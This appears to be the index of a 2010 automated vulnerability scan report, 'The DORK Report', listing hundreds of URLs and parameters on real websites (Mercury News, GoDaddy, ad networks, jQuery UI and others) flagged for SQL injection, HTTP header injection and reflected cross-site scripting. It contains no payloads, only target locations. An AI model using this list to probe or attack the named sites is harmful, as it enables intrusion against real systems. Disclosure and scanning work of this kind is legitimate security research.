Report generated by Hoyt LLC at Mon Nov 15 12:04:33 CST 2010.


The DORK Report

Loading

1. SQL injection

1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

1.2. http://vacationrentals.mercurynews.com/vacation-rentals/mexico+1+3 [REST URL parameter 2]

1.3. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+san-diego+3+721 [REST URL parameter 2]

1.4. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+santa-cruz+3+749 [REST URL parameter 2]

1.5. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+south-lake-tahoe+3+48283 [REST URL parameter 2]

1.6. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+hawaii+2+11 [REST URL parameter 2]

1.7. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+nevada+las-vegas+3+1552 [REST URL parameter 2]

1.8. http://www.associatedcontent.com/article/6007620/pop_print.shtml [Referer HTTP header]

1.9. http://www.bing.com/fd/sa/0807035841/PostContent.js [REST URL parameter 2]

2. HTTP header injection

2.1. http://111.xg4ken.com/media/redir.php [client parameter]

2.2. http://111.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

2.3. http://111.xg4ken.com/media/redir.php [url[] parameter]

2.4. http://111.xg4ken.com/media/redir.php [utm_campaign parameter]

2.5. http://111.xg4ken.com/media/redir.php [utm_medium parameter]

2.6. http://111.xg4ken.com/media/redir.php [utm_source parameter]

2.7. http://111.xg4ken.com/media/redir.php [utm_term parameter]

2.8. http://c7.zedo.com/ibar/v12-002/c1/jsc/fcn1.js [c parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/q1.mng_bang/news_fr [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/q1.mng_bang/news_fr [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/q1.mng_bang/news_fr [sz parameter]

3.5. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 1]

3.6. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 2]

3.7. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 3]

3.8. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]

3.9. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [sz parameter]

3.10. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.11. http://ads.specificmedia.com/serve/v=5 [m parameter]

3.12. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

3.13. http://ap.feeds.theplatform.com/ps/JSON/PortalService/2.2/getReleaseList [PID parameter]

3.14. http://ap.feeds.theplatform.com/ps/JSON/PortalService/2.2/getReleaseList [query parameter]

3.15. https://auctions.godaddy.com/ [ci parameter]

3.16. https://auctions.godaddy.com/ [ci parameter]

3.17. https://auctions.godaddy.com/ [ci parameter]

3.18. https://auctions.godaddy.com/ [domain parameter]

3.19. https://auctions.godaddy.com/ [domain parameter]

3.20. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

3.21. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

3.22. http://bayarea.localhires.com/job_fairs/view/1039 [name of an arbitrarily supplied request parameter]

3.23. http://bayareamarketplace.kaango.com/ads/search [search parameter]

3.24. http://bayareamarketplace.kaango.com/feListAds [search parameter]

3.25. http://bookit.com/us/california/san-francisco/ [name of an arbitrarily supplied request parameter]

3.26. http://c7.zedo.com/ibar/v12-002/c1/jsc/fcn1.js [c parameter]

3.27. http://c7.zedo.com/jsc/c5/fl.js [l parameter]

3.28. http://c7.zedo.com/jsc/c5/fl.js [l parameter]

3.29. http://c7.zedo.com/jsc/c5/fl.js [name of an arbitrarily supplied request parameter]

3.30. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [l parameter]

3.31. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [name of an arbitrarily supplied request parameter]

3.32. http://cdn.widgetserver.com/syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ [REST URL parameter 18]

3.33. http://cdn.widgetserver.com/syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ [REST URL parameter 4]

3.34. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ [REST URL parameter 18]

3.35. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ [REST URL parameter 4]

3.36. http://consumertipsonline.net/health/us4.php [name of an arbitrarily supplied request parameter]

3.37. http://consumertipsonline.net/health/us4.php [t parameter]

3.38. http://counter.goingup.com/js/tracker.js [b parameter]

3.39. http://counter.goingup.com/js/tracker.js [st parameter]

3.40. http://ds.addthis.com/red/psi/p.json [callback parameter]

3.41. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]

3.42. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]

3.43. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]

3.44. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]

3.45. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]

3.46. http://fisherinvestments.tt.omtrdc.net/m2/fisherinvestments/mbox/standard [mbox parameter]

3.47. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]

3.48. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [REST URL parameter 1]

3.49. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [REST URL parameter 2]

3.50. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [name of an arbitrarily supplied request parameter]

3.51. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]

3.52. http://forums.mercurynews.com/forum/576 [REST URL parameter 1]

3.53. http://forums.mercurynews.com/forum/576 [REST URL parameter 2]

3.54. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]

3.55. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 1]

3.56. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 2]

3.57. http://forums.mercurynews.com/forum/business-technology-business-news [name of an arbitrarily supplied request parameter]

3.58. http://forums.mercurynews.com/forum/news [REST URL parameter 1]

3.59. http://forums.mercurynews.com/forum/news [REST URL parameter 2]

3.60. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]

3.61. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 1]

3.62. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 2]

3.63. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 3]

3.64. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 1]

3.65. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 2]

3.66. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 3]

3.67. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 1]

3.68. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 2]

3.69. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 3]

3.70. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 4]

3.71. http://forums.mercurynews.com/forums/jrss/forum/602/5 [callback parameter]

3.72. http://forums.mercurynews.com/forums/jrss/forum/602/5 [js_param1 parameter]

3.73. http://forums.mercurynews.com/forums/poll [REST URL parameter 1]

3.74. http://forums.mercurynews.com/forums/poll [REST URL parameter 2]

3.75. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 1]

3.76. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 2]

3.77. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 3]

3.78. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 1]

3.79. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 2]

3.80. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 3]

3.81. http://forums.mercurynews.com/poll [REST URL parameter 1]

3.82. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]

3.83. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [REST URL parameter 1]

3.84. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [REST URL parameter 2]

3.85. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [name of an arbitrarily supplied request parameter]

3.86. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 1]

3.87. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 2]

3.88. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [REST URL parameter 1]

3.89. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [REST URL parameter 2]

3.90. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [name of an arbitrarily supplied request parameter]

3.91. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 1]

3.92. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 2]

3.93. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [name of an arbitrarily supplied request parameter]

3.94. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 1]

3.95. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 2]

3.96. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [name of an arbitrarily supplied request parameter]

3.97. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 1]

3.98. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 2]

3.99. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [name of an arbitrarily supplied request parameter]

3.100. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [REST URL parameter 1]

3.101. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [REST URL parameter 2]

3.102. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [name of an arbitrarily supplied request parameter]

3.103. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 1]

3.104. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 2]

3.105. http://forums.mercurynews.com/topic/ferret-theory-lv [name of an arbitrarily supplied request parameter]

3.106. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 1]

3.107. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 2]

3.108. http://forums.mercurynews.com/topic/oil-and-iran-war [name of an arbitrarily supplied request parameter]

3.109. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 1]

3.110. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 2]

3.111. http://forums.mercurynews.com/topic/oil-price-and-iran-war [name of an arbitrarily supplied request parameter]

3.112. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [REST URL parameter 1]

3.113. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [REST URL parameter 2]

3.114. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [name of an arbitrarily supplied request parameter]

3.115. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [REST URL parameter 1]

3.116. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [REST URL parameter 2]

3.117. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [name of an arbitrarily supplied request parameter]

3.118. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 1]

3.119. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 2]

3.120. http://forums.mercurynews.com/topic/war-crisis-in-september [name of an arbitrarily supplied request parameter]

3.121. http://forums.mercurynews.com/xml/comments [REST URL parameter 1]

3.122. http://forums.mercurynews.com/xml/comments [REST URL parameter 2]

3.123. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]

3.124. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 1]

3.125. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 2]

3.126. http://forums.mercurynews.com/xml/poll-link [name of an arbitrarily supplied request parameter]

3.127. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 1]

3.128. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 2]

3.129. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/vj [REST URL parameter 1]

3.130. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/vj [REST URL parameter 2]

3.131. http://ib.adnxs.com/ttj [pubclick parameter]

3.132. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpck parameter]

3.133. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpck parameter]

3.134. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpvc parameter]

3.135. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpvc parameter]

3.136. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.137. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.138. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.139. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.140. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.141. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.142. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.143. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.144. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.145. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.146. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.147. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.148. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.149. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.150. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.151. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.152. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.153. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.154. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.155. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.156. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.157. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.158. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.159. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.160. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.161. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.162. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.163. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.164. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.165. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.166. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.167. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.168. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.169. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.170. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.171. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.172. http://jqueryui.com/themeroller/ [fcActive parameter]

3.173. http://jqueryui.com/themeroller/ [fcContent parameter]

3.174. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.175. http://jqueryui.com/themeroller/ [fcError parameter]

3.176. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.177. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.178. http://jqueryui.com/themeroller/ [fcHover parameter]

3.179. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.180. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.181. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.182. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.183. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.184. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.185. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.186. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.187. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.188. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.189. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.190. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.191. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.192. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.193. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.194. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.195. http://mercurynews.stats.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]

3.196. http://msn.foxsports.com/nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230 [name of an arbitrarily supplied request parameter]

3.197. http://newspaperads.mercurynews.com/FSI/Page.aspx [version parameter]

3.198. http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx [name of an arbitrarily supplied request parameter]

3.199. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

3.200. https://secure.www.mercurynews.com/portlet/registration/html/info.jsp [rFreeForm parameter]

3.201. https://secure.www.mercurynews.com/registration/ [rPage parameter]

3.202. https://secure.www.mercurynews.com/registration/ [url parameter]

3.203. https://secure.www.siliconvalley.com/registration/ [rPage parameter]

3.204. https://secure.www.siliconvalley.com/registration/ [url parameter]

3.205. http://shops.godaddy.com/Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/ [isc parameter]

3.206. http://shops.godaddy.com/Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/ [isc parameter]

3.207. http://shops.godaddy.com/FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/ [isc parameter]

3.208. http://shops.godaddy.com/FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/ [isc parameter]

3.209. http://shops.godaddy.com/Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/ [isc parameter]

3.210. http://shops.godaddy.com/Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/ [isc parameter]

3.211. http://shops.godaddy.com/Myasiatrade-com/Flotap-t1000/ [isc parameter]

3.212. http://shops.godaddy.com/Myasiatrade-com/Flotap-t1000/ [isc parameter]

3.213. http://shops.godaddy.com/Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/ [isc parameter]

3.214. http://shops.godaddy.com/Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/ [isc parameter]

3.215. http://shops.godaddy.com/Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/ [isc parameter]

3.216. http://shops.godaddy.com/Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/ [isc parameter]

3.217. http://shops.godaddy.com/Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/ [isc parameter]

3.218. http://shops.godaddy.com/Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/ [isc parameter]

3.219. http://shops.godaddy.com/SHOPANNABANANA-COM/THANKSGIVING-CONVERSATION-CARD-GAME/ [isc parameter]

3.220. http://shops.godaddy.com/SHOPANNABANANA-COM/THANKSGIVING-CONVERSATION-CARD-GAME/ [isc parameter]

3.221. http://shops.godaddy.com/aSavings-com/Leapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green/ [isc parameter]

3.222. http://shops.godaddy.com/aSavings-com/Leapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green/ [isc parameter]

3.223. http://shops.godaddy.com/default.aspx [isc parameter]

3.224. http://shops.godaddy.com/default.aspx [isc parameter]

3.225. https://shops.godaddy.com/ [isc parameter]

3.226. https://shops.godaddy.com/ [isc parameter]

3.227. http://redcated/AAS/iview/260696261/direct [REST URL parameter 4]

3.228. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]

3.229. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]

3.230. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]

3.231. http://redcated/AAS/iview/260696261/direct [wi.728;hi.90/01/7275753708?click parameter]

3.232. http://redcated/AAS/iview/260696261/direct [wi.728;hi.90/01/7275753708?click parameter]

3.233. http://redcated/AAS/iview/260696261/direct [wi.728;hi.90/01/7275753708?click parameter]

3.234. http://redcated/BJ1/iview/214582710/direct/01 [REST URL parameter 4]

3.235. http://redcated/BJ1/iview/214582710/direct/01 [click parameter]

3.236. http://redcated/BJ1/iview/214582710/direct/01 [click parameter]

3.237. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]

3.238. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]

3.239. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]

3.240. http://redcated/CNT/iview/259243902/direct [REST URL parameter 4]

3.241. http://redcated/CNT/iview/259243902/direct [click parameter]

3.242. http://redcated/CNT/iview/259243902/direct [click parameter]

3.243. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]

3.244. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]

3.245. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]

3.246. http://redcated/CNT/iview/259243905/direct [REST URL parameter 4]

3.247. http://redcated/CNT/iview/259243905/direct [click parameter]

3.248. http://redcated/CNT/iview/259243905/direct [click parameter]

3.249. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]

3.250. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]

3.251. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]

3.252. http://redcated/ER1/jview/203115616/direct/01 [REST URL parameter 4]

3.253. http://redcated/ER1/jview/203115616/direct/01 [click parameter]

3.254. http://redcated/ER1/jview/203115616/direct/01 [name of an arbitrarily supplied request parameter]

3.255. http://redcated/INV/iview/255848431/direct/01 [name of an arbitrarily supplied request parameter]

3.256. http://redcated/K01/iview/208297447/direct/01/5244128 [REST URL parameter 4]

3.257. http://redcated/K01/iview/208297447/direct/01/5244128 [click parameter]

3.258. http://redcated/K01/iview/208297447/direct/01/5244128 [click parameter]

3.259. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]

3.260. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]

3.261. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]

3.262. http://redcated/NYC/iview/266847916/direct/01/8785527227 [click parameter]

3.263. http://redcated/NYC/iview/266847916/direct/01/8785527227 [name of an arbitrarily supplied request parameter]

3.264. http://redcated/TLC/jview/242390407/direct/01 [REST URL parameter 4]

3.265. http://redcated/TLC/jview/242390407/direct/01 [click parameter]

3.266. http://redcated/TLC/jview/242390407/direct/01 [click parameter]

3.267. http://redcated/TLC/jview/242390407/direct/01 [name of an arbitrarily supplied request parameter]

3.268. http://redcated/TLC/jview/242390407/direct/01 [name of an arbitrarily supplied request parameter]

3.269. http://weather.mercurynews.com/cgi-bin/findweather/getForecast [brand parameter]

3.270. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.271. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.272. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

3.273. http://www.airbnb.com/search/ [c parameter]

3.274. http://www.airbnb.com/search/ [location parameter]

3.275. http://www.ajmoss.com/bedding.php [name of an arbitrarily supplied request parameter]

3.276. http://www.ajmoss.com/bedding.php [name of an arbitrarily supplied request parameter]

3.277. http://www.associatedcontent.com/action_flag.shtml [redir parameter]

3.278. http://www.associatedcontent.com/recaptcha_iframe.shtml [comment_name parameter]

3.279. http://www.associatedcontent.com/recaptcha_iframe.shtml [content_type parameter]

3.280. http://www.associatedcontent.com/recaptcha_iframe.shtml [content_type_id parameter]

3.281. http://www.associatedcontent.com/recaptcha_iframe.shtml [disp_type parameter]

3.282. http://www.fi.com/weballey/alleyletter.aspx [CC parameter]

3.283. http://www.fi.com/weballey/alleyletter.aspx [CC parameter]

3.284. http://www.fi.com/weballey/alleyletter.aspx [PC parameter]

3.285. http://www.fi.com/weballey/alleyletter.aspx [PC parameter]

3.286. http://www.godaddy.com/Hosting/Legacy.aspx [name of an arbitrarily supplied request parameter]

3.287. http://www.godaddy.com/email/email-hosting.aspx [name of an arbitrarily supplied request parameter]

3.288. http://www.godaddy.com/hosting/web-hosting.aspx [name of an arbitrarily supplied request parameter]

3.289. http://www.godaddy.com/hosting/website-builder.aspx [name of an arbitrarily supplied request parameter]

3.290. http://www.godaddy.com/ssl/ssl-certificates.aspx [name of an arbitrarily supplied request parameter]

3.291. https://www.godaddy.com/gdshop/email.asp [name of an arbitrarily supplied request parameter]

3.292. https://www.godaddy.com/gdshop/hosting/hosting_build_website.asp [name of an arbitrarily supplied request parameter]

3.293. https://www.godaddy.com/gdshop/ssl/ssl.asp [name of an arbitrarily supplied request parameter]

3.294. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]

3.295. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]

3.296. http://www.hotelsoup.com/hotel.php [query parameter]

3.297. http://www.hotelsoup.com/hotel.php [query parameter]

3.298. http://www.infotrak.com/Widgets/ [width parameter]

3.299. http://www.mercurynews.com/mngi/tracking/track [c parameter]

3.300. http://www.mercurynews.com/mngi/tracking/track [n parameter]

3.301. http://www.mercurynews.com/mngi/tracking/track [s parameter]

3.302. http://www.mercurynews.com/mngi/tracking/track [t parameter]

3.303. http://www.pressdemocrat.com/article/20101114/NEWS/101119731/0/business [REST URL parameter 3]

3.304. http://www.pressdemocrat.com/article/20101114/NEWS/101119731/0/business [REST URL parameter 4]

3.305. http://www.sfgate.com/cgi-bin/article.cgi [type parameter]

3.306. http://www.sigalert.com/Portlet/Map.asp [partner parameter]

3.307. http://www.sigalert.com/Portlet/Map.asp [url parameter]

3.308. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [REST URL parameter 1]

3.309. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [REST URL parameter 2]

3.310. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [REST URL parameter 3]

3.311. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [REST URL parameter 5]

3.312. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [name of an arbitrarily supplied request parameter]

3.313. http://www.vacapedia.com/search_widget.php [_h parameter]

3.314. http://www.vacapedia.com/search_widget.php [_h parameter]

3.315. http://www.vacapedia.com/search_widget.php [_w parameter]

3.316. http://www.vacapedia.com/search_widget.php [_w parameter]

3.317. http://www.vacapedia.com/search_widget.php [affid parameter]

3.318. http://www.vacapedia.com/search_widget.php [paidid parameter]

3.319. http://www.vacapedia.com/search_widget.php [swt parameter]

3.320. http://www.zillow.com/cobrand/CobrandWidgetPage.htm [REST URL parameter 1]

3.321. http://www.zillow.com/cobrand/CobrandWidgetPage.htm [REST URL parameter 2]

3.322. https://auctions.godaddy.com/ [Referer HTTP header]

3.323. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.324. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.325. http://www.radiogodaddy.com/ [Referer HTTP header]

3.326. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [cli cookie]

3.327. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [cli cookie]

3.328. http://ads.yldmgrimg.net/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c [REST URL parameter 1]

